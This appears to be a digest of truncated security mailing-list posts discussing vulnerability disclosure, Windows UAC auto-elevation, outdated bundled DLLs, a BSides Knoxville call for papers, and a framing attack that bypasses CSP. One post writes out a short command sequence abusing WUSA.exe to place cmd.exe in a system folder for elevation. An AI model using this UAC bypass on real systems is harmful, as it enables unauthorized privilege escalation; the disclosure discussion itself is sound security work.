Posted by Stefan Kanthak on Feb 02

“Brandon Perry” <bperry.volatile () gmail com> wrote:

Do you mean something like

Copy %COMSPEC% Program.exe
MakeCAB.Exe Program.exe
Delete Program.exe
WUSA.Exe “%CD%Program.ex_” /Extract:%SystemDrive%

which according to the MSRC (which Apple usually refers to) does not qualify
since it only exploits the braindead autoelevation of the user account
control in its default setting, although every user of…

Posted by Stefan Kanthak on Feb 02

“Brandon Perry” <bperry.volatile () gmail com> wrote:

Or do you mean exploits like this one:
<http://seclists.org/fulldisclosure/2014/May/163>

EVERY developer should know that

* his/her software is not the only application installed on a users PC;

* the outdated or vulnerable components s/he delivers and ínstalls can
be called by every other application or malware running on a users PC!

JFTR: the MSVCRT DLL of Visual…

Posted by Adam Caudill on Feb 02

Calling all Makers, Hackers, Red Teams, Blue Teams, or anyone who wants to rant about security and privacy! The first
ever BSides Knoxville is scheduled for May 15th, 2015 @ Scruffy City Hall, and we’re looking for creative, cutting-edge
presentations. Whether you’ve devised a new attack against internet-connected gas pumps or discovered a new behavioral
analysis technique for identifying botnet C&C, we want to hear from you!…

Posted by Joey Fowler on Feb 02

Hi David,

“nice” is an understatement here.

I’ve done some testing with this one and, while there *are* quirks, it most
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don’t contain X-Frame-Options headers
(with `deny` or `same-origin` values), it executes successfully. Pending
the payload being injected, most Content Security Policies are also
bypassed (by…